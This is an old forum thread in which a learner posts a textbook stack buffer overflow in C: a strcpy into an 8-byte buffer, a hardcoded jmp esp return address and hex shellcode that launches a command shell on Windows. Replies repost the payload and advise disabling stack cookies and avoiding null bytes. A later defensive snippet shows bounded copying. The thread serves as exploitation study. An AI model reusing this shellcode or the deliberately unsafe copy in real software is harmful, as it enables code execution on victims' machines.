[Old post] Simplest buffer overflow, need help? 0.00 snowflakes
Posted on: 2011-9-26 14:22 3933

#include <stdio.h>
#include <string.h>

char name[] = "\x41\x41\x41\x41"   // name[0]-name[3]
              "\x41\x41\x41\x41"   // name[4]-name[7]
              "\x41\x41\x41\x41"   // overwrites the saved ebp
              "\x12\x45\xfa\x7f"   // overwrites the return address with the universal jmp esp address 0x7ffa4512
              // the bytes below pop up a cmd window
              "\x55\x89\xE5\x31\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53\xC6\x45\xF6\x56"
              "\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6\x45\xFB\x44"
              "\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\x8D\x45\xF4\x50\xBA\x7B\x1D\x80\x7C\xFF\xD2\x81"
              "\xEC\x10\x00\x00\x00\xC6\x45\xF4\x63\xC6\x45\xF5\x6F\xC6\x45\xF6\x6D\xC6\x45\xF7"
              "\x6D\xC6\x45\xF8\x61\xC6\x45\xF9\x6E\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45\xFC"
              "\x63\xC6\x45\xFD\x6F\xC6\x45\xFE\x6D\xC6\x45\xFF\x00\x8D\x45\xF4\x50\xB8\xC7\x93"
              "\xBF\x77\xFF\xD0\x89\xEC\x5D";

int main()
{
    char output[8];

    strcpy(output, name);   // copies past the end of the 8-byte buffer

    for (int i = 0; i < 8 && output[i]; i++)
        printf("\\0x%x", output[i]);

    return 0;
}

This is the tutorial from 《Q版缓冲区溢出教程》, but on my machine it does not pop up a cmd window?


Latest replies (8)
2
I have already tested the part of the shellcode that pops up the cmd window, and it runs...
2011-9-26 14:24
3
What is your build environment?
Is it a Debug build or a Release build?
2011-9-26 14:40
4
#include <stdio.h>
#include <string.h>

char name[] = {
    0x41,0x41,0x41,0x41,
    0x41,0x41,0x41,0x41,
    0x41,0x41,0x41,0x41,
    0x12,0x45,0xfa,0x7f,
    0x55,0x89,0xE5,0x31,0xC0,0x50,0x50,0x50,0xC6,0x45,0xF4,0x4D,0xC6,0x45,0xF5,0x53,0xC6,0x45,0xF6,0x56,
    0xC6,0x45,0xF7,0x43,0xC6,0x45,0xF8,0x52,0xC6,0x45,0xF9,0x54,0xC6,0x45,0xFA,0x2E,0xC6,0x45,0xFB,0x44,
    0xC6,0x45,0xFC,0x4C,0xC6,0x45,0xFD,0x4C,0x8D,0x45,0xF4,0x50,0xBA,0x7B,0x1D,0x80,0x7C,0xFF,0xD2,0x81,
    0xEC,0x10,0x00,0x00,0x00,0xC6,0x45,0xF4,0x63,0xC6,0x45,0xF5,0x6F,0xC6,0x45,0xF6,0x6D,0xC6,0x45,0xF7,
    0x6D,0xC6,0x45,0xF8,0x61,0xC6,0x45,0xF9,0x6E,0xC6,0x45,0xFA,0x64,0xC6,0x45,0xFB,0x2E,0xC6,0x45,0xFC,
    0x63,0xC6,0x45,0xFD,0x6F,0xC6,0x45,0xFE,0x6D,0xC6,0x45,0xFF,0x00,0x8D,0x45,0xF4,0x50,0xB8,0xC7,0x93,
    0xBF,0x77,0xFF,0xD0,0x89,0xEC,0x5D
};

/* The overflow now happens inside a separate function, so the overwritten
   return address is used as soon as overrun() returns, not only when main() exits. */
void overrun()
{
    char output[8];
    strcpy(output, name);
}

int main()
{
    /*strcpy(output, name);*/

    overrun();

    char output[8];   /* note: a separate, uninitialised buffer from the one in overrun() */
    for (int i = 0; i < 8 && output[i]; i++)
        printf("\\0x%x", output[i]);

    return 0;
}


Debugging it here, I find that it does get into the shellcode.
I don't understand what you mean by the cmd window. An extra one? It can't be just the one the program brings up by itself.
The way you have written it, the shellcode is only executed when main() exits.

PS: it needs a Release build, and the cookie security check has to be turned off in the project settings.
2011-9-26 15:15
5
It is only interesting when it doesn't work;
that is exactly why you have to patiently single-step it in the debugger, then the truth will surely come out. Good luck.
2011-9-26 15:52
6
I'm not really clear on this, sorry...
2011-9-26 16:02
7
0x41,0x41,0x41,0x41,
0x41,0x41,0x41,0x41,
0x41,0x41,0x41,0x41,
0x12,0x45,0xfa,0x7f,
0x55,0x89,0xE5,0x31,0xC0,0x50,0x50,0x50,0xC6,0x45,0xF4,0x4D,0xC6,0x45,0xF5,0x53,0xC6,0x45,0xF6,0x56,
0xC6,0x45,0xF7,0x43,0xC6,0x45,0xF8,0x52,0xC6,0x45,0xF9,0x54,0xC6,0x45,0xFA,0x2E,0xC6,0x45,0xFB,0x44,
0xC6,0x45,0xFC,0x4C,0xC6,0x45,0xFD,0x4C,0x8D,0x45,0xF4,0x50,0xBA,0x7B,0x1D,0x80,0x7C,0xFF,0xD2,0x81,
0xEC,0x10,0x00,0x00,0x00,0xC6,0x45,0xF4,0x63,0xC6,0x45,0xF5,0x6F,0xC6,0x45,0xF6,0x6D,0xC6,0x45,0xF7,
0x6D,0xC6,0x45,0xF8,0x61,0xC6,0x45,0xF9,0x6E,0xC6,0x45,0xFA,0x64,0xC6,0x45,0xFB,0x2E,0xC6,0x45,0xFC,
0x63,0xC6,0x45,0xFD,0x6F,0xC6,0x45,0xFE,0x6D,0xC6,0x45,0xFF,0x00,0x8D,0x45,0xF4,0x50,0xB8,0xC7,0x93,
0xBF,0x77,0xFF,0xD0,0x89,0xEC,0x5D


OP, you are using a string-handling function to do the overflow, so it gets truncated when it hits a 00.
Try memcpy instead; that will probably make it work.
Or replace the 00 bytes yourself and then write a decoder shellcode.

However, when I declare the part of name that actually needs to run as void fn() and execute it, it always crashes.
2011-9-26 16:22
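Added example, written for this thread and not code from any of the posts: it measures how much of a constructed payload strcpy() actually delivers before the first 0x00 that the reply above points at, and shows the bounds-checked copy that refuses the oversized source instead of overflowing an 8-byte output[]. The payload bytes, the fake return address 0x78563412 and the function names are this example's own assumptions.

```c
#include <stdlib.h>
#include <string.h>

/* Constructed sample payload (not the thread's shellcode): 12 filler bytes, a
   made-up return address, then 81 EC 10 00 00 00 (sub esp, 0x10), the thread's
   instruction whose immediate carries zero bytes, and 4 bytes after it. */
static const unsigned char sample_payload[] = {
    0x41,0x41,0x41,0x41, 0x41,0x41,0x41,0x41, 0x41,0x41,0x41,0x41,
    0x12,0x34,0x56,0x78,            /* constructed address, not a real gadget */
    0x81,0xEC,0x10,0x00,0x00,0x00,  /* first 0x00 is at offset 19 */
    0x90,0x90,0x90,0x90             /* bytes a strcpy() copy never reaches */
};

/* How many payload bytes strcpy() really delivers: copy into a heap buffer big
   enough for everything (so this demonstration itself cannot overflow) and
   measure what arrived. Returns len without copying if src has no 0x00 at all. */
size_t strcpy_delivers(const unsigned char *src, size_t len)
{
    if (memchr(src, 0, len) == NULL) return len;  /* no terminator: would read past src */
    char *dst = malloc(len + 1);
    if (dst == NULL) return 0;
    strcpy(dst, (const char *)src); /* stops at the first 0x00, as the thread says */
    size_t n = strlen(dst);
    free(dst);
    return n;
}

/* The fix for the thread's strcpy(output, name): refuse a copy that does not fit
   (terminator included) instead of smashing the caller's stack frame. memcpy()
   also carries embedded zeros through, which strcpy() never does. */
int copy_bounded(char *dst, size_t dstsz, const unsigned char *src, size_t len)
{
    if (dst == NULL || len + 1 > dstsz)
        return -1;
    memcpy(dst, src, len);
    dst[len] = '\0';
    return 0;
}

/* Demonstration helper: copy_bounded() of the sample into a dstsz-byte buffer.
   0 = copied intact, -1 = refused (as for the thread's 8-byte output[]). */
int copy_bounded_check(size_t dstsz)
{
    char *dst = malloc(dstsz + 1);
    if (dst == NULL) return -1;
    int rc = copy_bounded(dst, dstsz, sample_payload, sizeof sample_payload);
    if (rc == 0) rc = memcmp(dst, sample_payload, sizeof sample_payload);
    free(dst);
    return rc;
}
```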
8
No idea about this, bumping for you!
2011-9-26 16:38
haw
9
Just debug it in OD and you'll see.
2011-9-28 11:06